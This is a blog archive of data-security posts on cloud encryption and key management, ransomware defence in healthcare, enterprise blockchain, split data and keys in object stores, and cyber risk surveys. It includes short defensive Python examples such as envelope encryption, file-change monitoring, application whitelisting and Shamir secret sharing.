Category Archives: Data Security

Current forecast: Cloudy with a chance of exposed data

By Peter Galvin, Chief Strategy & Marketing Officer, Thales eSecurity

Today, organizations are rapidly adopting cloud technology. Many have implemented a cloud-first philosophy, requiring that any new application or IT investment start with the cloud. And not just one cloud: organizations are investing in multiple clouds and SaaS applications. The numbers are truly revolutionary.

According to our 2018 Data Threat Report, the majority of businesses don’t operate in just one cloud environment in a single location, but in several. This typically entails working with a number of different vendors to source the right applications, platforms and infrastructure for each workload and business need.

The business community is truly embracing the cloud. The scale of deployment is indicated by the following statistics from our report:

  • More than half (57 percent) rely on two or three Platform as a Service (PaaS) vendors
  • 42 percent are using 50 or more Software as a Service (SaaS) applications
  • 94 percent of respondents are using sensitive data in cloud, big data, IoT or mobile environments

But with widespread enterprise adoption of cloud technologies come very real data security risks. Though these technologies unquestionably deliver tangible business benefits, they also increase attack surfaces and open up fresh conduits for data loss. For example, 62 percent of respondents in our report cite a lack of control over the location of data stored in the cloud as a top security concern.

These issues with cloud security are now hitting the news headlines on an increasingly regular basis. Most recently, Amazon and Tesla – two of the biggest players in the tech industry – have made waves for their cloud insecurities. Interestingly, in both of these cases the initial breach was the work of a ‘good actor’ highlighting vulnerabilities in the respective cloud environments of each organisation. While data exposure wasn’t the primary catalyst for either breach, both incidents showed all too clearly how easily the data could have been exposed.

Enterprises also frequently run into trouble because they deploy many disparate security solutions to protect cloud technologies, over-simplify basic security protocols (such as reusing the same password for everything) or fail to take seriously the notion that security is a shared responsibility. While cloud providers increasingly offer security features, organisations must remember that they – and they alone – are responsible for protecting their data.

Businesses shouldn’t be afraid to adopt emerging technologies that accelerate growth and digital transformation. However, they also need to understand how to mitigate the new vulnerabilities those technologies introduce. Fortunately, there are options for managing multiple cloud environments simply and securely. Amongst these, we believe the most effective is the deployment of encryption with key management technology.

If data is encrypted, it simply cannot be exploited unless the appropriate key is used to decrypt it. However, when it is being transferred to the cloud, many organisations face the same set of challenges around protection, storage and control of their encryption keys. The best practice in this instance would be to separate these keys from their respective data, and, as organisations transition to the cloud, retain control of the keys (instead of relinquishing them to the cloud provider).
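To make this key-separation principle concrete, here is a minimal sketch of envelope encryption in Python using the open-source `cryptography` package: the data key that encrypts the payload is itself wrapped under a master key that never leaves your premises, so only ciphertext and a wrapped key ever reach the cloud. The in-memory key handling is illustrative only; in production the master key would live in an HSM or key manager.

```python
# Minimal envelope-encryption sketch (illustrative, not a product API).
# Requires the third-party `cryptography` package: pip install cryptography
from cryptography.fernet import Fernet

# Master key: generated and retained on-premises (ideally in an HSM).
master_key = Fernet.generate_key()
master = Fernet(master_key)

# Per-object data key, used to encrypt the payload itself.
data_key = Fernet.generate_key()
ciphertext = Fernet(data_key).encrypt(b"sensitive record")

# Wrap the data key under the master key before anything is stored.
wrapped_data_key = master.encrypt(data_key)

# `ciphertext` and `wrapped_data_key` can go to the cloud; `master_key` stays local.
# To decrypt later: unwrap the data key, then decrypt the payload.
plaintext = Fernet(master.decrypt(wrapped_data_key)).decrypt(ciphertext)
assert plaintext == b"sensitive record"
```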

At Thales eSecurity we offer multi-cloud advanced encryption and multi-cloud key management solutions to help enterprises protect and maintain full control of their data, regardless of whether their multi-cloud strategy is public, private or hybrid.

To learn more, please visit our dedicated cloud security landing page. In the meantime, you can find me on Twitter at @pgalvin63.





Don’t Be Held for Ransom: Five Strategies to Secure Healthcare Data Against Cyberattacks

Today’s headlines might lead you to believe that ransomware is a recent invention. Would you be shocked to learn that it’s almost 30 years old? Back in 1989, AIDS researcher Dr. Joseph Popp used a bit of social engineering to trick his colleagues into using infected floppy disks masquerading as a questionnaire to measure an individual’s risk of contracting AIDS. Imagine: 20,000 floppy disks were sent out to research colleagues in 90 countries. Little did these researchers realize that Popp had infected the disks with malware known as the “AIDS Trojan.” Interestingly, the virus was only activated after the computer had been booted 90 times, at which point it displayed a ransom note that demanded between $189 and $378.

Back then, the damage was limited because organizations did not depend as heavily on computing and technologies were not as interconnected as they are today. Companies also had little choice but to hope that their backups were solid and that their antivirus software could help disinfect and patch the problem. When kept up to date and properly maintained, these tools might have even been able to detect and quarantine a virus.

There is unfortunately no ransomware antidote other than completely unplugging your equipment. Even then, some malware is smart enough to jump air gaps and infect victims in other ways. Paying the ransom is not a great idea, since it does not preclude you from falling victim again to the same threat actor, who may have planted additional malware during the initial attack.


Five Key Healthcare Data Security Strategies

These days, ransomware attackers aren’t so patient — they are anxious to get their hands dirty and make money. Similarly, security defense and response strategies should not be stuck in 1989 — especially for healthcare institutions that handle sensitive patient data. By applying basic and effective practices, these institutions can better secure healthcare data and reduce their risk of exposure.

Many organizations start with a cybersecurity risk assessment of essential practices against standards such as the National Institute of Standards and Technology (NIST) Cybersecurity Framework to evaluate their current maturity, identify gaps and put structured programs in place to reduce risk accordingly. It is crucial to create repeatable, sustainable practices with accountability, and to measure and report your progress along the way.

Below are five key areas to consider that could have a measurable impact on your efforts to secure healthcare data.

1. Back Up Your Data to Get Back Up Quickly

It’s fitting that a good ‘backup’ can help your business get ‘back up’ and running quickly. Develop effective backup techniques and processes, and make sure your backups are copied to offline media or elsewhere to reduce the chance of this data also being infected. Consider using additional tools to protect your vital information. This would require you to know what data is most critical, its value and its risk level, and to monitor activity across the network, endpoints and servers to detect and block unusual activity. For example, a high number of reads or writes on a file share could indicate that ransomware encryption is taking place.
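As a rough illustration of that last point, the sketch below polls a file share and raises an alert when the number of recently modified files spikes above a threshold. The path and threshold are hypothetical; a real deployment would use the platform's file-event APIs and a baseline learned from normal activity.

```python
# Hypothetical ransomware-activity monitor: flag bursts of file changes.
import os
import time

WATCH_DIR = "/mnt/fileshare"    # hypothetical monitored share
WINDOW_SECONDS = 60
MAX_CHANGES_PER_WINDOW = 500    # threshold; tune to your normal baseline

def count_recent_changes(root: str, window: float) -> int:
    """Count files under `root` modified within the last `window` seconds."""
    cutoff = time.time() - window
    changes = 0
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            try:
                if os.path.getmtime(os.path.join(dirpath, name)) >= cutoff:
                    changes += 1
            except OSError:
                continue  # file vanished mid-scan
    return changes

while True:
    changed = count_recent_changes(WATCH_DIR, WINDOW_SECONDS)
    if changed > MAX_CHANGES_PER_WINDOW:
        print(f"ALERT: {changed} files modified in {WINDOW_SECONDS}s -- possible ransomware")
    time.sleep(WINDOW_SECONDS)
```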

2. Patches Aren’t Just for Jeans

Learn to love patching. Develop automated patch management programs for all practical areas of your infrastructure, from networks, endpoints and servers to applications, databases and, yes, even medical devices, sensors and monitors, since many medical devices can be patched.

When WannaCry hit last year, we found that the clients who had good patching hygiene were not affected. For healthcare, patient safety and quality of care can be directly tied to device security. A cyberattack can affect the operation, configuration and safety of a device itself and can put lives at risk. Look for solutions that manage the full life cycle of endpoints, deploy patches as soon as a vulnerability is discovered in any device and use automation to reduce patch cycle times.

3. Use Effective Network Segmentation

Network segmentation means splitting a computer network into subnetworks that can limit attackers’ lateral movement by confining them to just one zone and potentially keep them away from more critical areas. Effective segmentation controls visitor access to protected data and creates an environment where staff members only have access to data they need to do their jobs.

Another option is to narrow down the number of open ports, since attackers frequently scan for and seek these out to gain entry. To give you an idea of how pervasive this issue is, I once scanned a large provider’s multiple data centers and found no fewer than 750,000 open ports — that’s a lot of open doors! For especially sensitive systems such as electronic medical records (EMRs), that could mean closing down ports 22 and 23, which are frequently used for remote access, and limiting access to critical mobile devices, such as nursing tablets, by geofencing so that devices are only functional when they are on a designated Wi-Fi network.

4. Make a List and Check It Twice

Find out if your applications are naughty or nice — and whitelist those that fall into the latter category. Whitelisting apps means specifying a list of software applications that are permitted to be present and active in your systems. By running only approved programs, you reduce the risk of ransomware executing as a rogue app.

As more healthcare professionals use tablets and phones to manage and treat patients, it is important to establish a mobile device management (MDM) policy that addresses applications that don’t meet your requirements. Although this might seem almost impossible, the best approach is to start small and build your whitelist gradually by engaging experts and using automation software, such as application profiling solutions. The same holds true for cloud applications: You need to gain visibility into which cloud apps are in use, assess their risks, whitelist vetted applications and provide access via unified identity validation.
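To picture what enforcement looks like beneath such tooling, here is a minimal hash-based whitelist check in Python. The digest in the approved set is a placeholder; in practice the list is generated by application-profiling tools and kept under change control.

```python
# Sketch of hash-based application whitelisting: only binaries whose
# SHA-256 digest appears in the approved set may run.
import hashlib

APPROVED_SHA256 = {
    # Placeholder digest; real entries come from profiling vetted binaries.
    "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
}

def sha256_of(path: str) -> str:
    """Stream the file so large binaries don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def is_whitelisted(path: str) -> bool:
    return sha256_of(path) in APPROVED_SHA256
```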

5. Hop on the Train

While many ransomware attacks come through vulnerable web applications, some are caused by unknowing users. Your users are your first defense: If they are educated and aware, they can block many intrusions.

Make sure everyone in your organization, including administrative staff and contractors, understands what ransomware looks like and what they can do to prevent an attack. Increase user awareness with training and test them via phishing simulations. A recent healthcare study found that physicians are three times more likely to click on and spread malware than individuals in nonprovider roles, such as office workers. Do your users know how to hover over links and report phishing attacks?

You should also train users on best practices for password management. It’s too tempting to reuse the same credentials when password management is burdensome. Consider adding multifactor authentication (MFA), including biometrics, to remove the need for passwords.

Learn More About Mitigating Ransomware

Now that we’ve discussed some ways you can protect your organization from cyberthreats, you might also be wondering what you can do to both prepare for and respond to ransomware attacks. To learn more, read our Ransomware Response Guide, then step into the future and take action.


Blockchain Technology: Conflicting Perspectives on Enterprise Security From the RSA Conference 2018

Blockchain technology was perhaps the most controversial topic at last week’s RSA Conference in San Francisco. It’s fitting, because distributed ledger technologies are also hotly debated in conversations about enterprise technology. For most organizations, the idea of blockchain is suspended somewhere between hype and disappointment, realism and naked hope. The perspective all depends on who you’re talking to.

Twitter is a fairly good barometer to gauge how these competing viewpoints played out at RSAC 2018. Some participants in the discussion asserted that blockchain is the key to achieving General Data Protection Regulation (GDPR) compliance, while others questioned the technology’s scalability. Some RSAC attendees were unfamiliar with blockchain altogether.

If we’ve learned anything from the cybersecurity threat climate, it’s that security should never be sacrificed for speed. Hype around any emerging technology puts pressure on developers to innovate quickly. If a technology is inherently flawed or a poor fit for the use case, that speed is not a good thing.

Over the past several days, some of the brightest minds in the industry put their heads together to determine where blockchain technology truly fits into the enterprise, how technological weaknesses can be exploited and whether the risks outweigh the benefits.

When Hype Obscures the Status Quo: Who Won the Production Race?

While there’s significant discussion about blockchain’s potential and the challenges related to its adoption, there’s a lot less data about who actually won the race to production. It’s never easy to get a pulse on a fast-changing market, but recent research has revealed that the majority of enterprises are not in production. As of July 2017, 6 in 10 enterprises had deployed the technology or planned to do so, with most implementations slated for late 2018.

Another survey found that 3 percent of enterprises have blockchain apps in production. It also noted that:

  • 28 percent of organizations are actively testing blockchain.
  • 20 percent are in the discovery or evaluation phase.
  • 4 percent are testing or piloting the technology.
  • 2 percent are in testing or development.

Meanwhile, 67 percent of enterprises investing in blockchain had already spent over $100,000 by the end of 2016 and 91 percent planned to spend at least that much in 2017. This trend suggests that organizations see value in blockchain technology and are willing to continue to invest in research to unlock its potential benefits.

Creating a Secure Enterprise Baseline for Blockchain

So, should enterprises proceed with innovation, given the fact that blockchain is still shrouded in hype, uncertainties and risk? The conversations that took place at RSAC 2018 suggest that blockchain could be part of the solution, but it really depends on what type of blockchain you’re talking about and how you approach it.

In the Tuesday session titled “Trust as a Service — Beyond the Blockchain Hype,” representatives from Verizon talked about how the telecommunications giant spent a decade creating a billion-event solution to big blockchain problems such as integrity, attribution and provenance. On Thursday, two Samsung engineers shared specific techniques for writing smarter and better code in the session titled “An Overview of Blockchain-Based Smart Contract Security Vulnerabilities.”

David Huseby and Marta Piekarska of the Linux Foundation emphasized the importance of establishing baseline questions for conceptualizing security innovation in their Tuesday session, “Blockchain — The New Black. What About Enterprise Security?” They also explained the difference between private and permissioned blockchains.

Once organizations understand the benefits of using a private approach to blockchain, they can address important topics, such as flexibility, security and industry-specific regulations, before they begin the proof-of-concept phase.

Considerations for Enterprise Blockchain

Blockchain is still a gamble, but enterprises can build upon the foundations of others. Standards, industry-specific best practices and an increasingly rich ecosystem of insights enable organizations to understand how industry leaders are addressing the foundational nuances of distributed ledger technology and using it to their advantage.

Cathie Yun, a software engineer at Chain, spoke about considerations — not necessarily weaknesses — for enterprise blockchain use during the session titled “Foundations of Bitcoin, Blockchain and Smart Contracts,” a replay of which is available via RSAC onDemand. She noted that organizations should address the following areas when gathering requirements:

  • Trust model;
  • Administration;
  • Identity; and
  • Confidentiality.

Blockchain Is Not Pixie Dust

“Blockchains are often viewed as security pixie dust,” asserted Ron Rivest, MIT professor and cryptographer. “If you add them to your application, they magically make it better.”

During “The Cryptographers’ Panel,” which opened the conference, Rivest talked over key topics with fellow cryptography experts Adi Shamir of The Weizmann Institute in Israel, researcher Paul Kocher, Moxie Marlinspike of Signal and Whitfield Diffie of Cryptomathic.

“Blockchain is an interesting tool, but it’s not a business,” agreed Kocher. “It’s just an interesting thing you can use to build a system like a log management tool.”

Blockchain, according to Rivest, offers “interesting properties, [including] decentralized, public access.” As Marlinspike highlighted, the problem with capitalizing on the value of blockchain technology is that there are relatively few applications that actually value those properties.

While their analysis of blockchain and its potential was critical overall, Marlinspike said he interprets the hype as a sign of hope. Distributed ledger technology may not be pixie dust, but it could indicate that what Marlinspike called the “multitrillion-dollar problem” of security is being taken seriously since it’s a foundation-level approach to solving issues of data, access and identity in drastically new ways.

The consensus among the speakers at RSAC was that blockchain is no magic bullet. Rather, as Piekarska put it, blockchain is more like a “very advanced screwdriver.”

Understanding the Blockchain Backlash

There’s a root cause behind this backlash against blockchain technology, and it has very little to do with any supposed lack of enterprise use cases. There are many success stories about blockchain in production, and many organizations are moving from the proof-of-concept stage through testing toward full production by the end of 2018.

For the 45,000 cybersecurity professionals on the ground at RSAC 2018, this past year was the most challenging in the history of cybersecurity. A recent Ponemon study found that 45 percent of chief information officers (CIOs) fear that they’ll lose their jobs as a result of a data breach in the year ahead, and 67 percent believe that such an incident is likely to occur.

The backlash against blockchain is thus largely a revolt against the hype — and that’s not an entirely bad thing. Security professionals aren’t buying the suggestion that there’s a magic bullet or an out-of-the-box blockchain solution that can solve all their security woes. CIOs generally take a cautious approach to emerging technologies, especially something as shrouded in hype as blockchain.

As enterprise solutions and use cases of distributed ledgers emerge across industries, this technology is still in the early stages of evolution. If this year’s conference is any indication, it’s safe to say that blockchain will be a trending topic once again at RSAC 2019.


When Nobody Controls Your Object Stores — Except You

In recent months and years, we have seen the benefit of low-cost object stores offered by cloud service providers (CSPs). In some circles, these are called “Swift” or “S3” stores. However, as often as the topic of object or cloud storage emerges, so does the topic of securing the data within those object stores.

CSPs often promise that their environments are secure and, in some cases, that the data is protected through encryption — but how do you know for sure? Furthermore, CSPs offer extremely high redundancy, but what happens if you cannot access the CSP at all, or if you want to move your data out of that CSP’s environment entirely?

Also, who controls the key? Some CSPs propose strategies such as bring-your-own-key (BYOK). However, these approaches are laughable because you have to give the encryption key to the CSP. In that case, it is not your key — it’s their key. BYOK should be called GUYK (give-up-your-key), GUYKAD (give-up-your-key-and-data) or JTMD (just-take-my-data).

Imagine if you could store your data in object stores of any cloud, encrypted under keys that only you control, and transport it easily across multiple clouds and CSPs, enabling you to move between or out of CSPs at your leisure.

What Are Object Stores?

Object stores are systems that store data as objects instead of treating them as files and placing them in a file hierarchy or file system. Some object stores are layered with additional features that allow them to be provided as a desktop service, such as Box or Dropbox. However, the critical value of object stores is that they are inexpensive and highly scalable.

[Graphic: Object store with centralized policy management]

Whether you need a gigabyte or a zettabyte of storage, object stores can provide that storage to you easily and inexpensively. That is the simple part.

Protecting Data in the Cloud

Regardless of the kind of storage you consider, protecting the data therein is necessary in today’s climate. Remember that even when storage is inexpensive, your data is still immensely valuable, you are still responsible for it and you do not want those assets to become liabilities.

How do we protect this data in the truest sense of the word? The answer is simply to encrypt it. However, if the CSP encrypts the data, you must give it the key. You can consider the thought experiments of BYOK, negotiation, wrapping and other key management practices, but at the end of the day, the CSP still has your key. Is there a way the data can be encrypted and stored in their cloud without the CSP accessing it or preventing you from easily switching to another provider?

Encryption of Cloud Object Store Data You Fully Control

There is only one way to maintain full control over your data when it is stored in a cloud object store: by encrypting the data with keys you own and manage before it actually reaches the cloud object store. But does this mean you have to programmatically encrypt the data before you actually upload it?

Luckily, the answer to that question is no, you do not have to programmatically encrypt the data yourself. The new IBM Multi-Cloud Data Encryption object store agent will transparently and automatically do this for you. In fact, this new capability acts as a proxy between your applications and your cloud object store. It transparently intercepts the data you are uploading to the cloud object store and automatically encrypts it with keys you control. Similarly, it intercepts the data you are retrieving back from the cloud object store and decrypts it using the appropriate keys.
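The snippet below is not the IBM product's API; it is a generic sketch of the proxy pattern just described, using `boto3`-style S3 calls and Fernet encryption with a key the caller owns. Bucket name, credentials and key storage are all assumptions.

```python
# Generic client-side encrypting wrapper for an S3-compatible object store.
# Assumes boto3 credentials are configured; names here are illustrative.
import boto3
from cryptography.fernet import Fernet

class EncryptingObjectStore:
    def __init__(self, bucket: str, key: bytes):
        self.s3 = boto3.client("s3")
        self.bucket = bucket
        self.fernet = Fernet(key)  # key you own and manage, never sent to the CSP

    def put(self, name: str, data: bytes) -> None:
        # Ciphertext is all the provider ever sees.
        self.s3.put_object(Bucket=self.bucket, Key=name,
                           Body=self.fernet.encrypt(data))

    def get(self, name: str) -> bytes:
        blob = self.s3.get_object(Bucket=self.bucket, Key=name)["Body"].read()
        return self.fernet.decrypt(blob)

store = EncryptingObjectStore("my-bucket", Fernet.generate_key())
store.put("record-1", b"plaintext never leaves the premises unencrypted")
```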

Splitting the Bounty and the Key

We can now extend the concept of encrypting object stores. There is a well-established practice in cloud data protection called data-splitting, which is combined with the concept of key-splitting, also known as secret-sharing.

The fundamental premise of this practice is based on two specific steps. The first step is to take the data and split it into multiple “chunks.” This is not exactly like taking a $100 bill and ripping it into three pieces, but it is similar (we will get to that in a bit).

The second step is to encrypt each chunk of data under its own key. Once you have an encrypted chunk, you can place it in an object store. If you have three chunks, you can store them in three different object stores. However, that is not the whole story.

This approach ensures that no object store (or CSP) has access to the unencrypted data or any single key to decrypt it. Even if an object store CSP had access to the encryption key for the data in its object store, it would still have insufficient information to recover the plaintext — it would need the other chunks and their keys.

But this approach gets even more interesting: In this scenario, a subset of the chunks is required to reassemble the original plaintext. This is sometimes called “M-of-N” because it only requires access to M chunks of all N chunks of the data (M being a subset of N) to recover the data. That means that you can have your N chunks stored in the object stores of N different cloud service providers, but you only need access to a subset (M) of those object stores to recover your data. CSPs have neither access to sufficient information (keys or cipher text) nor a necessary component to recover your object store data, which means that nobody controls your object stores — except you.
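To make the M-of-N idea concrete, here is a toy Shamir secret-sharing sketch in Python: a secret becomes N shares, any M of which recover it, while fewer than M reveal nothing. This is educational code only; real deployments use vetted libraries and apply the scheme to keys and data chunks at scale.

```python
# Toy M-of-N (Shamir) secret sharing over a prime field.
import secrets

PRIME = 2**127 - 1  # a Mersenne prime comfortably larger than the secret

def make_shares(secret: int, m: int, n: int):
    # Random polynomial of degree m-1 whose constant term is the secret.
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(m - 1)]
    def f(x):
        return sum(c * pow(x, i, PRIME) for i, c in enumerate(coeffs)) % PRIME
    return [(x, f(x)) for x in range(1, n + 1)]

def recover(shares):
    # Lagrange interpolation at x = 0 recovers the constant term.
    secret = 0
    for xi, yi in shares:
        num, den = 1, 1
        for xj, _ in shares:
            if xj != xi:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        secret = (secret + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    return secret

shares = make_shares(secret=42, m=3, n=5)  # N = 5 chunks across 5 CSPs
assert recover(shares[:3]) == 42           # any M = 3 of them suffice
assert recover(shares[1:4]) == 42
```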

[Diagram: Encrypted object stores with data splitting and key splitting]

Greater Flexibility to Change CSPs

Let’s assume that one day you decide that one of the CSPs no longer meets your criteria. Perhaps it is too expensive, it has been breached, it is in the wrong country, its policies have changed, it supports the wrong team or it just isn’t the awesome piece of chocolate cake you dreamed of.

Now you have greater flexibility to change. Just add a new object store to your N (N+1) and then close your account with the CSP you no longer want to use, and you’re done. The CSP did not have access to your data or keys before, and it can now take back all of that storage that contained those random bits of your encrypted data and sell it to somebody else. This is cryptographic shredding at its finest.

You should anticipate questions concerning the increased cost of storage with this approach, but it is nothing new. Remember that storage is inexpensive, but your data is extremely valuable. As an industry, we have been adopting storage strategies such as Redundant Array of Independent Disks (RAID) for years. The benefits of that kind of redundancy overwhelmingly outweigh the costs of the additional disk drives. Although data-splitting is not exactly the same as RAID, the concepts are very similar, as are the benefits and the return on investment (ROI).

Data- and key-splitting are not new, but their combination in an M-of-N approach to protecting object stores is quickly gaining traction. This is critical to the security, risk reduction and flexibility necessary to accelerate our pursuit of the cloud. We no longer need to trust the CSP or adopt a GUYK, GUYKAD or JTMD strategy.

With M-of-N cryptography, data-splitting and crypto-shredding strategies, you can stay in control of your keys and data and ensure that nobody else controls your object stores except you. This is just the beginning of how we secure the cloud.


Lessons From the Marsh ‘Global Cyber Risk Perception Survey’: Disconnects Persist Despite Increased Executive Involvement

“Most organizations now rank cybersecurity among their highest risk management priorities.” — Marsh’s “Global Cyber Risk Perception Survey”

In February 2018, Marsh and Microsoft released a new report titled “By the Numbers: Global Cyber Risk Perception Survey” based on a survey of over 1,300 risk professionals and other senior executives, including chief executive officers (CEOs), chief financial officers (CFOs), chief technology officers (CTOs), chief risk officers (CROs) and board directors, across 26 industries.

Participants came from organizations located around the globe. More than 30 percent of respondents’ organizations did business in Europe, the U.K. and/or Ireland, North America and Asia. In terms of organization size, their revenues ranged from less than $10 million (about 20 percent) to over $1 billion (over 22 percent).

Cyber Risk Emerges as a Top Priority

In January 2018, a month prior to the report’s publication, the World Economic Forum (WEF) released its “Global Risks Report 2018,” which ranked two technological threats — cyberattacks and data fraud or theft — in the top five global risks by likelihood. The risk of cyberattacks also ranked sixth by impact.

The Marsh report echoed the findings from the WEF report. When asked how much attention their organization pays to cyber risks, 56 percent of respondents said they would rank it as a top-five concern, and 6 percent cited it as a No. 1 priority. Meanwhile, organizations that have been successfully attacked are only “slightly more likely” to prioritize cyber risks than companies that had not sustained an attack.

What Are Top Executives Concerned About?

According to the survey, the financial impact of cyber incidents varied between companies of different sizes. For example, 9 percent of organizations with less than $50 million in revenue estimated a financial impact of $10 million to $100 million. That figure rose to 26 percent for organizations with $50 million to $500 million in revenue, and 33 percent for companies that reported revenues of $500 million to $1 billion. Seventy-two percent of companies that earned more than $1 billion in revenue reported at least $10 million in potential financial losses associated with cyber risk, including 28 percent of such organizations that estimated losses above $100 million.

When asked about cyber events with high levels of potential impact, respondents said they were particularly concerned about business interruption (75 percent), reputational damage (59 percent) and the integrity of customer data (55 percent). Since the survey was administered in the summer of 2017, it should come as no surprise that extortion/ransomware and disruption of operational technology figured relatively high on the list of high-impact cyber events at 41 percent and 29 percent, respectively.

Business leaders are also concerned about how a successful attack or breach can affect their partnerships and contracts. Thirty-five percent of executives cited liability to third parties resulting from a system breach as a top risk. “In an era in which increasingly sophisticated attacks are likely, how an organization responds is subject to intense public scrutiny,” the report noted.

Only 28 percent of respondents reported a high level of confidence in their organization’s ability to identify and assess threats. Even more worrisome, just 19 percent said they were confident that their company could respond to and recover from a security incident.

What Are Organizations Doing About Cyber Risks?

The report noted that “sophisticated organizations” are more likely to have adopted a holistic approach that “enlists stakeholders from across the enterprise focused on the entire life cycle — beyond only prevention — to include risk assessment, mitigation and cyber resilience.” This is reflected in the range of responses about functional areas that were reported as “primary owners and decision-makers for cyber risk management.” While IT is still listed as the primary owner for over 70 percent of respondents, more than 25 percent also pointed to the CEO or president, board of directors or a formal risk management function as primary owners of cyber risks. For organizations smaller than $10 million by revenue, the CEO or president was more likely to be listed as the primary owner of cyber risks than the IT department.

The report also shed light on the actions that organizations are taking to get their cyber risks under control. Sixty-nine percent of “highly confident” organizations said they conducted a cybersecurity assessment, and another 55 percent said they conducted penetration tests. For organizations that are only “fairly confident” in their management of cyber risks, those numbers dropped to 49 percent and 38 percent, respectively.

Concerning their actions to prevent and mitigate cyber risks, highly confident organizations implemented or improved phishing awareness (68 percent), encrypted machines (55 percent), vulnerability and patch management (52 percent), and multifactor authentication (MFA) for remote users (53 percent). Fairly confident organizations took similar actions but at a somewhat lower rate: 56 percent boosted phishing awareness, 45 percent deployed encryption, 49 percent prioritized patch management and 42 percent adopted MFA.

Finally, 53 percent of highly confident organizations said they had developed a cyber incident response plan. Meanwhile, 30 percent of fairly confident organizations and only 10 percent of organizations that self-reported as being not confident in their risk management capabilities said they had established an incident response strategy.

The Final Grade: Cyber Risk Perception Survey Reveals Room for Improvement

Even with the increased involvement of various stakeholders, Marsh’s risk perception survey pointed to ongoing disconnects between the security function and the board. While 45 percent of risk and technology executives said they report information to board directors about cybersecurity investment initiatives, only 18 percent of board directors said they receive such information.

“This information gap points to the need to develop cyber risk economic/business models that facilitate a shared dialogue, including common language among IT, the board and other corporate departments,” the report’s authors noted. The survey also highlighted how rarely cyber risks are put in business terms: Only 11 percent of respondents reported quantifying cyber risks in economic terms, such as value at risk.

Taken in its entirety, the report painted a mixed picture of the state of cyber risk communication and management. While 45 percent of organizations said they estimate the financial impact of a cyber incident, executives should improve their ability to prioritize cybersecurity investments based on their risk appetite and link those investments to business strategy and the performance of controls. They should also follow common risk governance frameworks, such as the Committee of Sponsoring Organizations (COSO) of the Treadway Commission’s enterprise risk management (ERM) framework and the International Organization for Standardization (ISO)’s updated guidelines, ISO 31000:2018.


Password Managers: Business Gains vs Potential Pains

The growth in cybersecurity continues unabated and we see companies investing more and more in the area. According to Gartner, enterprise cybersecurity spending will rise to $96.3bn in 2018.


Most US consumers don’t trust companies to keep their data private

While a majority of the US public sees companies’ ability to keep data private as absolutely key, it has little trust in companies to do so. In fact, only 20 percent of them “completely trust” organizations they interact with to maintain the privacy of their data, the results of a recent survey have shown. They are also much more worried about hackers accessing their data than companies using it for purposes they have not agreed to.


MinerEye introduces AI-powered Data Tracker

MinerEye is launching MinerEye Data Tracker, an AI-powered governance and data protection solution that will enable companies to continuously identify, organize, track and protect vast information assets including undermanaged, unstructured and dark data for safe and compliant cloud migration. Most data tracking and classification technologies categorize data based on descriptive elements such as file size, type, name and location. MinerEye dives deeply into the basic data form to its essence – to uncover and categorize it.


Neighborhood Watch: Uniting the Data Security Community Through Software Development Kits

Back in the 1970s, the National Sheriffs’ Association made the Neighborhood Watch program a national initiative. The program as we know it today stemmed from communities looking to enlist citizens to help combat the growing rate of burglaries, especially in rural and suburban areas where police forces were not as highly concentrated.

While the National Neighborhood Watch initially served to lend extra eyes and ears to combating crime, today it has evolved into a proactive and community-oriented program that brings neighbors together to work toward a common goal for the good of the group.

According to the program’s official website, crime rates are lower in communities where citizens are most engaged. Given the increasing sophistication and volume of cybercrime, the data security community would do well to take a page out of the Neighborhood Watch playbook to boost collaboration and innovation among cyberdefenders.

Evolving Threat Vectors and the Growing Cybercrime Community

In 2017, there were 25 percent fewer data breaches than the year before, according to the IBM X-Force Threat Intelligence Index 2018. This seems like good news on the surface, but the headlines we saw throughout the past year tell a different story.

Despite the decreased number of breaches, the impact of cybercrime was still felt broadly. We saw businesses pay cybercriminals $8 billion worldwide to gain access to their data after being locked out by ransomware. Many of these ransoms were paid in anonymizing and cybercrime-enabling cryptocurrencies such as bitcoin and Monero, which became much more prominent in the public eye this past year. Ransomware wasn’t the only type of cybersecurity threat to wreak havoc in 2017, however — there were also network attacks, insider threats and malware, to name a few.

The security landscape is changing, and not for the better. New risk metrics and vectors are emerging, and cybercriminals are becoming more sophisticated. As more companies shift to a data-first approach and smart devices become internet-enabled, security incidents will only evolve and expand — and the threat actor community will grow larger and stronger as cybercrime becomes more lucrative.

Empowering the Security Community With Software Development Kits

All is not lost, however. We security professionals have a community of our own, and we are united in our common goal to combat cybercrime.

One way to activate this group of security-oriented Samaritans is through tools such as software development kits (SDKs). These toolkits often feed into a broader application exchange program and allow technology partners to build integrations that fill in the gaps and extend the functionality of core products. Companies such as Kaspersky, Bitdefender, PayPal, Splunk and IBM are enabling developers to bolster the security offerings of their respective products. Just as the Neighborhood Watch program brought members of communities across the U.S. together to combat crime on the streets, these SDKs and application exchange programs aim to bring the best and brightest minds of security together to combat cybercrime.

Security solutions that provide software development kits for business and technology partners to develop integrations are a boon to this community of cyberdefenders. These integrations can draw on external products or services for better analytics or data security policy compliance. They can also be built to host security rules or highlight and report suspicious activities to an external source. The IBM Security Guardium SDK, for example, allows for connectivity with all Guardium REST APIs, and each app is hosted in its own Docker container to enable enhanced flexibility.

A Neighborhood Watch for the Data Security Community

Today, there are four use case categories of interest for which we are inviting business partners to build apps: risk discovery and classification, new data sources and platforms supported for data protection, big data aggregation and analytics, and industry-focused compliance solutions. These four use cases can be addressed in a variety of ways. For example, apps can be built to present a combination of internal and external data in tables or visualizations. They can also integrate data from external products or services for better analytics and/or compliance. In addition, apps can be built to host security rules or highlight anomalous activities and send reports to an external source.

The final piece of the puzzle is the skills and expertise of the business partners and developers themselves. Without collaboration from those who are looking for new challenges and innovative ways to contribute to the data security community at large, we can’t move forward. Much like the Neighborhood Watch, the security world needs to band together as a community to ensure that data privacy and security principles are upheld.

So what are you waiting for? To get started, download the Guardium SDK.



Open Banking: Tremendous Opportunity for Consumers, New Security Challenges for Financial Institutions

The concept of open banking, as structured by the U.K.’s Open Banking and PSD2 regulations, is designed to enable third-party payment service providers (TPPs) to access account information and perform payments under the authorization of the account owner.

